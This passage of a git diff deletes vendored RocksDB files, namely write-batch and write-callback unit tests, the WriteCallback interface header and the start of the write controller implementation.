-      "Merge(foo, bar)",
-      handler.seen);
-}
-
-TEST_F(WriteBatchTest, PrepareCommit) {
-  WriteBatch batch;
-  WriteBatchInternal::InsertNoop(&batch);
-  batch.Put(Slice("k1"), Slice("v1"));
-  batch.Put(Slice("k2"), Slice("v2"));
-  batch.SetSavePoint();
-  WriteBatchInternal::MarkEndPrepare(&batch, Slice("xid1"));
-  Status s = batch.RollbackToSavePoint();
-  ASSERT_EQ(s, Status::NotFound());
-  WriteBatchInternal::MarkCommit(&batch, Slice("xid1"));
-  WriteBatchInternal::MarkRollback(&batch, Slice("xid1"));
-  ASSERT_EQ(2, batch.Count());
-
-  TestHandler handler;
-  batch.Iterate(&handler);
-  ASSERT_EQ(
-      "MarkBeginPrepare()"
-      "Put(k1, v1)"
-      "Put(k2, v2)"
-      "MarkEndPrepare(xid1)"
-      "MarkCommit(xid1)"
-      "MarkRollback(xid1)",
-      handler.seen);
-}
-
-// It requires more than 30GB of memory to run the test. With single memory
-// allocation of more than 30GB.
-// Not all platform can run it. Also it runs a long time. So disable it.
-TEST_F(WriteBatchTest, DISABLED_ManyUpdates) {
-  // Insert key and value of 3GB and push total batch size to 12GB.
-  static const size_t kKeyValueSize = 4u;
-  static const uint32_t kNumUpdates = 3 << 30;
-  std::string raw(kKeyValueSize, 'A');
-  WriteBatch batch(kNumUpdates * (4 + kKeyValueSize * 2) + 1024u);
-  char c = 'A';
-  for (uint32_t i = 0; i < kNumUpdates; i++) {
-    if (c > 'Z') {
-      c = 'A';
-    }
-    raw[0] = c;
-    raw[raw.length() - 1] = c;
-    c++;
-    batch.Put(raw, raw);
-  }
-
-  ASSERT_EQ(kNumUpdates, batch.Count());
-
-  struct NoopHandler : public WriteBatch::Handler {
-    uint32_t num_seen = 0;
-    char expected_char = 'A';
-    virtual Status PutCF(uint32_t column_family_id, const Slice& key,
-                         const Slice& value) override {
-      EXPECT_EQ(kKeyValueSize, key.size());
-      EXPECT_EQ(kKeyValueSize, value.size());
-      EXPECT_EQ(expected_char, key[0]);
-      EXPECT_EQ(expected_char, value[0]);
-      EXPECT_EQ(expected_char, key[kKeyValueSize - 1]);
-      EXPECT_EQ(expected_char, value[kKeyValueSize - 1]);
-      expected_char++;
-      if (expected_char > 'Z') {
-        expected_char = 'A';
-      }
-      ++num_seen;
-      return Status::OK();
-    }
-    virtual Status DeleteCF(uint32_t column_family_id,
-                            const Slice& key) override {
-      ADD_FAILURE();
-      return Status::OK();
-    }
-    virtual Status SingleDeleteCF(uint32_t column_family_id,
-                                  const Slice& key) override {
-      ADD_FAILURE();
-      return Status::OK();
-    }
-    virtual Status MergeCF(uint32_t column_family_id, const Slice& key,
-                           const Slice& value) override {
-      ADD_FAILURE();
-      return Status::OK();
-    }
-    virtual void LogData(const Slice& blob) override { ADD_FAILURE(); }
-    virtual bool Continue() override { return num_seen < kNumUpdates; }
-  } handler;
-
-  batch.Iterate(&handler);
-  ASSERT_EQ(kNumUpdates, handler.num_seen);
-}
-
-// The test requires more than 18GB memory to run it, with single memory
-// allocation of more than 12GB. Not all the platform can run it. So disable it.
-TEST_F(WriteBatchTest, DISABLED_LargeKeyValue) {
-  // Insert key and value of 3GB and push total batch size to 12GB.
-  static const size_t kKeyValueSize = 3221225472u;
-  std::string raw(kKeyValueSize, 'A');
-  WriteBatch batch(size_t(12884901888ull + 1024u));
-  for (char i = 0; i < 2; i++) {
-    raw[0] = 'A' + i;
-    raw[raw.length() - 1] = 'A' - i;
-    batch.Put(raw, raw);
-  }
-
-  ASSERT_EQ(2, batch.Count());
-
-  struct NoopHandler : public WriteBatch::Handler {
-    int num_seen = 0;
-    virtual Status PutCF(uint32_t column_family_id, const Slice& key,
-                         const Slice& value) override {
-      EXPECT_EQ(kKeyValueSize, key.size());
-      EXPECT_EQ(kKeyValueSize, value.size());
-      EXPECT_EQ('A' + num_seen, key[0]);
-      EXPECT_EQ('A' + num_seen, value[0]);
-      EXPECT_EQ('A' - num_seen, key[kKeyValueSize - 1]);
-      EXPECT_EQ('A' - num_seen, value[kKeyValueSize - 1]);
-      ++num_seen;
-      return Status::OK();
-    }
-    virtual Status DeleteCF(uint32_t column_family_id,
-                            const Slice& key) override {
-      ADD_FAILURE();
-      return Status::OK();
-    }
-    virtual Status SingleDeleteCF(uint32_t column_family_id,
-                                  const Slice& key) override {
-      ADD_FAILURE();
-      return Status::OK();
-    }
-    virtual Status MergeCF(uint32_t column_family_id, const Slice& key,
-                           const Slice& value) override {
-      ADD_FAILURE();
-      return Status::OK();
-    }
-    virtual void LogData(const Slice& blob) override { ADD_FAILURE(); }
-    virtual bool Continue() override { return num_seen < 2; }
-  } handler;
-
-  batch.Iterate(&handler);
-  ASSERT_EQ(2, handler.num_seen);
-}
-
-TEST_F(WriteBatchTest, Continue) {
-  WriteBatch batch;
-
-  struct Handler : public TestHandler {
-    int num_seen = 0;
-    virtual Status PutCF(uint32_t column_family_id, const Slice& key,
-                         const Slice& value) override {
-      ++num_seen;
-      return TestHandler::PutCF(column_family_id, key, value);
-    }
-    virtual Status DeleteCF(uint32_t column_family_id,
-                            const Slice& key) override {
-      ++num_seen;
-      return TestHandler::DeleteCF(column_family_id, key);
-    }
-    virtual Status SingleDeleteCF(uint32_t column_family_id,
-                                  const Slice& key) override {
-      ++num_seen;
-      return TestHandler::SingleDeleteCF(column_family_id, key);
-    }
-    virtual Status MergeCF(uint32_t column_family_id, const Slice& key,
-                           const Slice& value) override {
-      ++num_seen;
-      return TestHandler::MergeCF(column_family_id, key, value);
-    }
-    virtual void LogData(const Slice& blob) override {
-      ++num_seen;
-      TestHandler::LogData(blob);
-    }
-    virtual bool Continue() override { return num_seen < 5; }
-  } handler;
-
-  batch.Put(Slice("k1"), Slice("v1"));
-  batch.Put(Slice("k2"), Slice("v2"));
-  batch.PutLogData(Slice("blob1"));
-  batch.Delete(Slice("k1"));
-  batch.SingleDelete(Slice("k2"));
-  batch.PutLogData(Slice("blob2"));
-  batch.Merge(Slice("foo"), Slice("bar"));
-  batch.Iterate(&handler);
-  ASSERT_EQ(
-      "Put(k1, v1)"
-      "Put(k2, v2)"
-      "LogData(blob1)"
-      "Delete(k1)"
-      "SingleDelete(k2)",
-      handler.seen);
-}
-
-TEST_F(WriteBatchTest, PutGatherSlices) {
-  WriteBatch batch;
-  batch.Put(Slice("foo"), Slice("bar"));
-
-  {
-    // Try a write where the key is one slice but the value is two
-    Slice key_slice("baz");
-    Slice value_slices[2] = { Slice("header"), Slice("payload") };
-    batch.Put(SliceParts(&key_slice, 1),
-              SliceParts(value_slices, 2));
-  }
-
-  {
-    // One where the key is composite but the value is a single slice
-    Slice key_slices[3] = { Slice("key"), Slice("part2"), Slice("part3") };
-    Slice value_slice("value");
-    batch.Put(SliceParts(key_slices, 3),
-              SliceParts(&value_slice, 1));
-  }
-
-  WriteBatchInternal::SetSequence(&batch, 100);
-  ASSERT_EQ("Put(baz, headerpayload)@101"
-            "Put(foo, bar)@100"
-            "Put(keypart2part3, value)@102",
-            PrintContents(&batch));
-  ASSERT_EQ(3, batch.Count());
-}
-
-namespace {
-class ColumnFamilyHandleImplDummy : public ColumnFamilyHandleImpl {
- public:
-  explicit ColumnFamilyHandleImplDummy(int id)
-      : ColumnFamilyHandleImpl(nullptr, nullptr, nullptr), id_(id) {}
-  uint32_t GetID() const override { return id_; }
-  const Comparator* GetComparator() const override {
-    return BytewiseComparator();
-  }
-
- private:
-  uint32_t id_;
-};
-}  // namespace anonymous
-
-TEST_F(WriteBatchTest, ColumnFamiliesBatchTest) {
-  WriteBatch batch;
-  ColumnFamilyHandleImplDummy zero(0), two(2), three(3), eight(8);
-  batch.Put(&zero, Slice("foo"), Slice("bar"));
-  batch.Put(&two, Slice("twofoo"), Slice("bar2"));
-  batch.Put(&eight, Slice("eightfoo"), Slice("bar8"));
-  batch.Delete(&eight, Slice("eightfoo"));
-  batch.SingleDelete(&two, Slice("twofoo"));
-  batch.DeleteRange(&two, Slice("3foo"), Slice("4foo"));
-  batch.Merge(&three, Slice("threethree"), Slice("3three"));
-  batch.Put(&zero, Slice("foo"), Slice("bar"));
-  batch.Merge(Slice("omom"), Slice("nom"));
-
-  TestHandler handler;
-  batch.Iterate(&handler);
-  ASSERT_EQ(
-      "Put(foo, bar)"
-      "PutCF(2, twofoo, bar2)"
-      "PutCF(8, eightfoo, bar8)"
-      "DeleteCF(8, eightfoo)"
-      "SingleDeleteCF(2, twofoo)"
-      "DeleteRangeCF(2, 3foo, 4foo)"
-      "MergeCF(3, threethree, 3three)"
-      "Put(foo, bar)"
-      "Merge(omom, nom)",
-      handler.seen);
-}
-
-#ifndef ROCKSDB_LITE
-TEST_F(WriteBatchTest, ColumnFamiliesBatchWithIndexTest) {
-  WriteBatchWithIndex batch;
-  ColumnFamilyHandleImplDummy zero(0), two(2), three(3), eight(8);
-  batch.Put(&zero, Slice("foo"), Slice("bar"));
-  batch.Put(&two, Slice("twofoo"), Slice("bar2"));
-  batch.Put(&eight, Slice("eightfoo"), Slice("bar8"));
-  batch.Delete(&eight, Slice("eightfoo"));
-  batch.SingleDelete(&two, Slice("twofoo"));
-  batch.DeleteRange(&two, Slice("twofoo"), Slice("threefoo"));
-  batch.Merge(&three, Slice("threethree"), Slice("3three"));
-  batch.Put(&zero, Slice("foo"), Slice("bar"));
-  batch.Merge(Slice("omom"), Slice("nom"));
-
-  std::unique_ptr<WBWIIterator> iter;
-
-  iter.reset(batch.NewIterator(&eight));
-  iter->Seek("eightfoo");
-  ASSERT_OK(iter->status());
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ(WriteType::kPutRecord, iter->Entry().type);
-  ASSERT_EQ("eightfoo", iter->Entry().key.ToString());
-  ASSERT_EQ("bar8", iter->Entry().value.ToString());
-
-  iter->Next();
-  ASSERT_OK(iter->status());
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ(WriteType::kDeleteRecord, iter->Entry().type);
-  ASSERT_EQ("eightfoo", iter->Entry().key.ToString());
-
-  iter->Next();
-  ASSERT_OK(iter->status());
-  ASSERT_TRUE(!iter->Valid());
-
-  iter.reset(batch.NewIterator(&two));
-  iter->Seek("twofoo");
-  ASSERT_OK(iter->status());
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ(WriteType::kPutRecord, iter->Entry().type);
-  ASSERT_EQ("twofoo", iter->Entry().key.ToString());
-  ASSERT_EQ("bar2", iter->Entry().value.ToString());
-
-  iter->Next();
-  ASSERT_OK(iter->status());
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ(WriteType::kSingleDeleteRecord, iter->Entry().type);
-  ASSERT_EQ("twofoo", iter->Entry().key.ToString());
-
-  iter->Next();
-  ASSERT_OK(iter->status());
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ(WriteType::kDeleteRangeRecord, iter->Entry().type);
-  ASSERT_EQ("twofoo", iter->Entry().key.ToString());
-  ASSERT_EQ("threefoo", iter->Entry().value.ToString());
-
-  iter->Next();
-  ASSERT_OK(iter->status());
-  ASSERT_TRUE(!iter->Valid());
-
-  iter.reset(batch.NewIterator());
-  iter->Seek("gggg");
-  ASSERT_OK(iter->status());
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ(WriteType::kMergeRecord, iter->Entry().type);
-  ASSERT_EQ("omom", iter->Entry().key.ToString());
-  ASSERT_EQ("nom", iter->Entry().value.ToString());
-
-  iter->Next();
-  ASSERT_OK(iter->status());
-  ASSERT_TRUE(!iter->Valid());
-
-  iter.reset(batch.NewIterator(&zero));
-  iter->Seek("foo");
-  ASSERT_OK(iter->status());
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ(WriteType::kPutRecord, iter->Entry().type);
-  ASSERT_EQ("foo", iter->Entry().key.ToString());
-  ASSERT_EQ("bar", iter->Entry().value.ToString());
-
-  iter->Next();
-  ASSERT_OK(iter->status());
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ(WriteType::kPutRecord, iter->Entry().type);
-  ASSERT_EQ("foo", iter->Entry().key.ToString());
-  ASSERT_EQ("bar", iter->Entry().value.ToString());
-
-  iter->Next();
-  ASSERT_OK(iter->status());
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ(WriteType::kMergeRecord, iter->Entry().type);
-  ASSERT_EQ("omom", iter->Entry().key.ToString());
-  ASSERT_EQ("nom", iter->Entry().value.ToString());
-
-  iter->Next();
-  ASSERT_OK(iter->status());
-  ASSERT_TRUE(!iter->Valid());
-
-  TestHandler handler;
-  batch.GetWriteBatch()->Iterate(&handler);
-  ASSERT_EQ(
-      "Put(foo, bar)"
-      "PutCF(2, twofoo, bar2)"
-      "PutCF(8, eightfoo, bar8)"
-      "DeleteCF(8, eightfoo)"
-      "SingleDeleteCF(2, twofoo)"
-      "DeleteRangeCF(2, twofoo, threefoo)"
-      "MergeCF(3, threethree, 3three)"
-      "Put(foo, bar)"
-      "Merge(omom, nom)",
-      handler.seen);
-}
-#endif  // !ROCKSDB_LITE
-
-TEST_F(WriteBatchTest, SavePointTest) {
-  Status s;
-  WriteBatch batch;
-  batch.SetSavePoint();
-
-  batch.Put("A", "a");
-  batch.Put("B", "b");
-  batch.SetSavePoint();
-
-  batch.Put("C", "c");
-  batch.Delete("A");
-  batch.SetSavePoint();
-  batch.SetSavePoint();
-
-  ASSERT_OK(batch.RollbackToSavePoint());
-  ASSERT_EQ(
-      "Delete(A)@3"
-      "Put(A, a)@0"
-      "Put(B, b)@1"
-      "Put(C, c)@2",
-      PrintContents(&batch));
-
-  ASSERT_OK(batch.RollbackToSavePoint());
-  ASSERT_OK(batch.RollbackToSavePoint());
-  ASSERT_EQ(
-      "Put(A, a)@0"
-      "Put(B, b)@1",
-      PrintContents(&batch));
-
-  batch.Delete("A");
-  batch.Put("B", "bb");
-
-  ASSERT_OK(batch.RollbackToSavePoint());
-  ASSERT_EQ("", PrintContents(&batch));
-
-  s = batch.RollbackToSavePoint();
-  ASSERT_TRUE(s.IsNotFound());
-  ASSERT_EQ("", PrintContents(&batch));
-
-  batch.Put("D", "d");
-  batch.Delete("A");
-
-  batch.SetSavePoint();
-
-  batch.Put("A", "aaa");
-
-  ASSERT_OK(batch.RollbackToSavePoint());
-  ASSERT_EQ(
-      "Delete(A)@1"
-      "Put(D, d)@0",
-      PrintContents(&batch));
-
-  batch.SetSavePoint();
-
-  batch.Put("D", "d");
-  batch.Delete("A");
-
-  ASSERT_OK(batch.RollbackToSavePoint());
-  ASSERT_EQ(
-      "Delete(A)@1"
-      "Put(D, d)@0",
-      PrintContents(&batch));
-
-  s = batch.RollbackToSavePoint();
-  ASSERT_TRUE(s.IsNotFound());
-  ASSERT_EQ(
-      "Delete(A)@1"
-      "Put(D, d)@0",
-      PrintContents(&batch));
-
-  WriteBatch batch2;
-
-  s = batch2.RollbackToSavePoint();
-  ASSERT_TRUE(s.IsNotFound());
-  ASSERT_EQ("", PrintContents(&batch2));
-
-  batch2.Delete("A");
-  batch2.SetSavePoint();
-
-  s = batch2.RollbackToSavePoint();
-  ASSERT_OK(s);
-  ASSERT_EQ("Delete(A)@0", PrintContents(&batch2));
-
-  batch2.Clear();
-  ASSERT_EQ("", PrintContents(&batch2));
-
-  batch2.SetSavePoint();
-
-  batch2.Delete("B");
-  ASSERT_EQ("Delete(B)@0", PrintContents(&batch2));
-
-  batch2.SetSavePoint();
-  s = batch2.RollbackToSavePoint();
-  ASSERT_OK(s);
-  ASSERT_EQ("Delete(B)@0", PrintContents(&batch2));
-
-  s = batch2.RollbackToSavePoint();
-  ASSERT_OK(s);
-  ASSERT_EQ("", PrintContents(&batch2));
-
-  s = batch2.RollbackToSavePoint();
-  ASSERT_TRUE(s.IsNotFound());
-  ASSERT_EQ("", PrintContents(&batch2));
-
-  WriteBatch batch3;
-
-  s = batch3.PopSavePoint();
-  ASSERT_TRUE(s.IsNotFound());
-  ASSERT_EQ("", PrintContents(&batch3));
-
-  batch3.SetSavePoint();
-  batch3.Delete("A");
-
-  s = batch3.PopSavePoint();
-  ASSERT_OK(s);
-  ASSERT_EQ("Delete(A)@0", PrintContents(&batch3));
-}
-
-TEST_F(WriteBatchTest, MemoryLimitTest) {
-  Status s;
-  // The header size is 12 bytes. The two Puts take 8 bytes which gives total
-  // of 12 + 8 * 2 = 28 bytes.
-  WriteBatch batch(0, 28);
-
-  ASSERT_OK(batch.Put("a", "...."));
-  ASSERT_OK(batch.Put("b", "...."));
-  s = batch.Put("c", "....");
-  ASSERT_TRUE(s.IsMemoryLimit());
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/db/write_callback.h b/thirdparty/rocksdb/db/write_callback.h
deleted file mode 100644
index 6517a7c..0000000
--- a/thirdparty/rocksdb/db/write_callback.h
+++ /dev/null
@@ -1,27 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#include "rocksdb/status.h"
-
-namespace rocksdb {
-
-class DB;
-
-class WriteCallback {
- public:
-  virtual ~WriteCallback() {}
-
-  // Will be called while on the write thread before the write executes.  If
-  // this function returns a non-OK status, the write will be aborted and this
-  // status will be returned to the caller of DB::Write().
-  virtual Status Callback(DB* db) = 0;
-
-  // return true if writes with this callback can be batched with other writes
-  virtual bool AllowWriteBatching() = 0;
-};
-
-}  //  namespace rocksdb
diff --git a/thirdparty/rocksdb/db/write_callback_test.cc b/thirdparty/rocksdb/db/write_callback_test.cc
deleted file mode 100644
index d2bf30a..0000000
--- a/thirdparty/rocksdb/db/write_callback_test.cc
+++ /dev/null
@@ -1,397 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#include <atomic>
-#include <functional>
-#include <string>
-#include <utility>
-#include <vector>
-
-#include "db/db_impl.h"
-#include "db/write_callback.h"
-#include "rocksdb/db.h"
-#include "rocksdb/write_batch.h"
-#include "port/port.h"
-#include "util/random.h"
-#include "util/sync_point.h"
-#include "util/testharness.h"
-
-using std::string;
-
-namespace rocksdb {
-
-class WriteCallbackTest : public testing::Test {
- public:
-  string dbname;
-
-  WriteCallbackTest() {
-    dbname = test::TmpDir() + "/write_callback_testdb";
-  }
-};
-
-class WriteCallbackTestWriteCallback1 : public WriteCallback {
- public:
-  bool was_called = false;
-
-  Status Callback(DB *db) override {
-    was_called = true;
-
-    // Make sure db is a DBImpl
-    DBImpl* db_impl = dynamic_cast<DBImpl*> (db);
-    if (db_impl == nullptr) {
-      return Status::InvalidArgument("");
-    }
-
-    return Status::OK();
-  }
-
-  bool AllowWriteBatching() override { return true; }
-};
-
-class WriteCallbackTestWriteCallback2 : public WriteCallback {
- public:
-  Status Callback(DB *db) override {
-    return Status::Busy();
-  }
-  bool AllowWriteBatching() override { return true; }
-};
-
-class MockWriteCallback : public WriteCallback {
- public:
-  bool should_fail_ = false;
-  bool allow_batching_ = false;
-  std::atomic<bool> was_called_{false};
-
-  MockWriteCallback() {}
-
-  MockWriteCallback(const MockWriteCallback& other) {
-    should_fail_ = other.should_fail_;
-    allow_batching_ = other.allow_batching_;
-    was_called_.store(other.was_called_.load());
-  }
-
-  Status Callback(DB* db) override {
-    was_called_.store(true);
-    if (should_fail_) {
-      return Status::Busy();
-    } else {
-      return Status::OK();
-    }
-  }
-
-  bool AllowWriteBatching() override { return allow_batching_; }
-};
-
-TEST_F(WriteCallbackTest, WriteWithCallbackTest) {
-  struct WriteOP {
-    WriteOP(bool should_fail = false) { callback_.should_fail_ = should_fail; }
-
-    void Put(const string& key, const string& val) {
-      kvs_.push_back(std::make_pair(key, val));
-      write_batch_.Put(key, val);
-    }
-
-    void Clear() {
-      kvs_.clear();
-      write_batch_.Clear();
-      callback_.was_called_.store(false);
-    }
-
-    MockWriteCallback callback_;
-    WriteBatch write_batch_;
-    std::vector<std::pair<string, string>> kvs_;
-  };
-
-  // In each scenario we'll launch multiple threads to write.
-  // The size of each array equals to number of threads, and
-  // each boolean in it denote whether callback of corresponding
-  // thread should succeed or fail.
-  std::vector<std::vector<WriteOP>> write_scenarios = {
-      {true},
-      {false},
-      {false, false},
-      {true, true},
-      {true, false},
-      {false, true},
-      {false, false, false},
-      {true, true, true},
-      {false, true, false},
-      {true, false, true},
-      {true, false, false, false, false},
-      {false, false, false, false, true},
-      {false, false, true, false, true},
-  };
-
-  for (auto& two_queues : {true, false}) {
-    for (auto& allow_parallel : {true, false}) {
-      for (auto& allow_batching : {true, false}) {
-        for (auto& enable_WAL : {true, false}) {
-          for (auto& enable_pipelined_write : {true, false}) {
-            for (auto& write_group : write_scenarios) {
-              Options options;
-              options.create_if_missing = true;
-              options.allow_concurrent_memtable_write = allow_parallel;
-              options.enable_pipelined_write = enable_pipelined_write;
-              options.concurrent_prepare = two_queues;
-
-              ReadOptions read_options;
-              DB* db;
-              DBImpl* db_impl;
-
-              DestroyDB(dbname, options);
-              ASSERT_OK(DB::Open(options, dbname, &db));
-
-              db_impl = dynamic_cast<DBImpl*>(db);
-              ASSERT_TRUE(db_impl);
-
-              // Writers that have called JoinBatchGroup.
-              std::atomic<uint64_t> threads_joining(0);
-              // Writers that have linked to the queue
-              std::atomic<uint64_t> threads_linked(0);
-              // Writers that pass WriteThread::JoinBatchGroup:Wait sync-point.
-              std::atomic<uint64_t> threads_verified(0);
-
-              std::atomic<uint64_t> seq(db_impl->GetLatestSequenceNumber());
-              ASSERT_EQ(db_impl->GetLatestSequenceNumber(), 0);
-
-              rocksdb::SyncPoint::GetInstance()->SetCallBack(
-                  "WriteThread::JoinBatchGroup:Start", [&](void*) {
-                    uint64_t cur_threads_joining = threads_joining.fetch_add(1);
-                    // Wait for the last joined writer to link to the queue.
-                    // In this way the writers link to the queue one by one.
-                    // This allows us to confidently detect the first writer
-                    // who increases threads_linked as the leader.
-                    while (threads_linked.load() < cur_threads_joining) {
-                    }
-                  });
-
-              // Verification once writers call JoinBatchGroup.
-              rocksdb::SyncPoint::GetInstance()->SetCallBack(
-                  "WriteThread::JoinBatchGroup:Wait", [&](void* arg) {
-                    uint64_t cur_threads_linked = threads_linked.fetch_add(1);
-                    bool is_leader = false;
-                    bool is_last = false;
-
-                    // who am i
-                    is_leader = (cur_threads_linked == 0);
-                    is_last = (cur_threads_linked == write_group.size() - 1);
-
-                    // check my state
-                    auto* writer = reinterpret_cast<WriteThread::Writer*>(arg);
-
-                    if (is_leader) {
-                      ASSERT_TRUE(writer->state ==
-                                  WriteThread::State::STATE_GROUP_LEADER);
-                    } else {
-                      ASSERT_TRUE(writer->state ==
-                                  WriteThread::State::STATE_INIT);
-                    }
-
-                    // (meta test) the first WriteOP should indeed be the first
-                    // and the last should be the last (all others can be out of
-                    // order)
-                    if (is_leader) {
-                      ASSERT_TRUE(writer->callback->Callback(nullptr).ok() ==
-                                  !write_group.front().callback_.should_fail_);
-                    } else if (is_last) {
-                      ASSERT_TRUE(writer->callback->Callback(nullptr).ok() ==
-                                  !write_group.back().callback_.should_fail_);
-                    }
-
-                    threads_verified.fetch_add(1);
-                    // Wait here until all verification in this sync-point
-                    // callback finish for all writers.
-                    while (threads_verified.load() < write_group.size()) {
-                    }
-                  });
-
-              rocksdb::SyncPoint::GetInstance()->SetCallBack(
-                  "WriteThread::JoinBatchGroup:DoneWaiting", [&](void* arg) {
-                    // check my state
-                    auto* writer = reinterpret_cast<WriteThread::Writer*>(arg);
-
-                    if (!allow_batching) {
-                      // no batching so everyone should be a leader
-                      ASSERT_TRUE(writer->state ==
-                                  WriteThread::State::STATE_GROUP_LEADER);
-                    } else if (!allow_parallel) {
-                      ASSERT_TRUE(writer->state ==
-                                      WriteThread::State::STATE_COMPLETED ||
-                                  (enable_pipelined_write &&
-                                   writer->state ==
-                                       WriteThread::State::
-                                           STATE_MEMTABLE_WRITER_LEADER));
-                    }
-                  });
-
-              std::atomic<uint32_t> thread_num(0);
-              std::atomic<char> dummy_key(0);
-
-              // Each write thread create a random write batch and write to DB
-              // with a write callback.
-              std::function<void()> write_with_callback_func = [&]() {
-                uint32_t i = thread_num.fetch_add(1);
-                Random rnd(i);
-
-                // leaders gotta lead
-                while (i > 0 && threads_verified.load() < 1) {
-                }
-
-                // loser has to lose
-                while (i == write_group.size() - 1 &&
-                       threads_verified.load() < write_group.size() - 1) {
-                }
-
-                auto& write_op = write_group.at(i);
-                write_op.Clear();
-                write_op.callback_.allow_batching_ = allow_batching;
-
-                // insert some keys
-                for (uint32_t j = 0; j < rnd.Next() % 50; j++) {
-                  // grab unique key
-                  char my_key = dummy_key.fetch_add(1);
-
-                  string skey(5, my_key);
-                  string sval(10, my_key);
-                  write_op.Put(skey, sval);
-
-                  if (!write_op.callback_.should_fail_) {
-                    seq.fetch_add(1);
-                  }
-                }
-
-                WriteOptions woptions;
-                woptions.disableWAL = !enable_WAL;
-                woptions.sync = enable_WAL;
-                Status s = db_impl->WriteWithCallback(
-                    woptions, &write_op.write_batch_, &write_op.callback_);
-
-                if (write_op.callback_.should_fail_) {
-                  ASSERT_TRUE(s.IsBusy());
-                } else {
-                  ASSERT_OK(s);
-                }
-              };
-
-              rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-              // do all the writes
-              std::vector<port::Thread> threads;
-              for (uint32_t i = 0; i < write_group.size(); i++) {
-                threads.emplace_back(write_with_callback_func);
-              }
-              for (auto& t : threads) {
-                t.join();
-              }
-
-              rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-
-              // check for keys
-              string value;
-              for (auto& w : write_group) {
-                ASSERT_TRUE(w.callback_.was_called_.load());
-                for (auto& kvp : w.kvs_) {
-                  if (w.callback_.should_fail_) {
-                    ASSERT_TRUE(
-                        db->Get(read_options, kvp.first, &value).IsNotFound());
-                  } else {
-                    ASSERT_OK(db->Get(read_options, kvp.first, &value));
-                    ASSERT_EQ(value, kvp.second);
-                  }
-                }
-              }
-
-              ASSERT_EQ(seq.load(), db_impl->GetLatestSequenceNumber());
-
-              delete db;
-              DestroyDB(dbname, options);
-            }
-          }
-        }
-      }
-    }
-}
-}
-
-TEST_F(WriteCallbackTest, WriteCallBackTest) {
-  Options options;
-  WriteOptions write_options;
-  ReadOptions read_options;
-  string value;
-  DB* db;
-  DBImpl* db_impl;
-
-  DestroyDB(dbname, options);
-
-  options.create_if_missing = true;
-  Status s = DB::Open(options, dbname, &db);
-  ASSERT_OK(s);
-
-  db_impl = dynamic_cast<DBImpl*> (db);
-  ASSERT_TRUE(db_impl);
-
-  WriteBatch wb;
-
-  wb.Put("a", "value.a");
-  wb.Delete("x");
-
-  // Test a simple Write
-  s = db->Write(write_options, &wb);
-  ASSERT_OK(s);
-
-  s = db->Get(read_options, "a", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("value.a", value);
-
-  // Test WriteWithCallback
-  WriteCallbackTestWriteCallback1 callback1;
-  WriteBatch wb2;
-
-  wb2.Put("a", "value.a2");
-
-  s = db_impl->WriteWithCallback(write_options, &wb2, &callback1);
-  ASSERT_OK(s);
-  ASSERT_TRUE(callback1.was_called);
-
-  s = db->Get(read_options, "a", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("value.a2", value);
-
-  // Test WriteWithCallback for a callback that fails
-  WriteCallbackTestWriteCallback2 callback2;
-  WriteBatch wb3;
-
-  wb3.Put("a", "value.a3");
-
-  s = db_impl->WriteWithCallback(write_options, &wb3, &callback2);
-  ASSERT_NOK(s);
-
-  s = db->Get(read_options, "a", &value);
-  ASSERT_OK(s);
-  ASSERT_EQ("value.a2", value);
-
-  delete db;
-  DestroyDB(dbname, options);
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
-
-#else
-#include <stdio.h>
-
-int main(int argc, char** argv) {
-  fprintf(stderr,
-          "SKIPPED as WriteWithCallback is not supported in ROCKSDB_LITE\n");
-  return 0;
-}
-
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/db/write_controller.cc b/thirdparty/rocksdb/db/write_controller.cc
deleted file mode 100644
index 558aa72..0000000
--- a/thirdparty/rocksdb/db/write_controller.cc
+++ /dev/null
@@ -1,128 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "db/write_controller.h"
-
-#include <atomic>
-#include <cassert>
-#include <ratio>
-#include "rocksdb/env.h"
-
-namespace rocksdb {
-
-std::unique_ptr<WriteControllerToken> WriteController::GetStopToken() {
-  ++total_stopped_;
-  return std::unique_ptr<WriteControllerToken>(new StopWriteToken(this));
-}
-
-std::unique_ptr<WriteControllerToken> WriteController::GetDelayToken(
-    uint64_t write_rate) {
-  total_delayed_++;
-  // Reset counters.
-  last_refill_time_ = 0;
-  bytes_left_ = 0;
-  set_delayed_write_rate(write_rate);
-  return std::unique_ptr<WriteControllerToken>(new DelayWriteToken(this));
-}
-
-std::unique_ptr<WriteControllerToken>
-WriteController::GetCompactionPressureToken() {
-  ++total_compaction_pressure_;
-  return std::unique_ptr<WriteControllerToken>(
-      new CompactionPressureToken(this));
-}
-
-bool WriteController::IsStopped() const {
-  return total_stopped_.load(std::memory_order_relaxed) > 0;
-}
-// This is inside DB mutex, so we can't sleep and need to minimize
